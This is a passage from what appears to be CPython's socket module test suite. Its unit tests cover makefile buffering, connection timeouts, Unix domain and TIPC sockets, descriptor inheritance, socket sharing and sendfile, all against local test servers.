while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
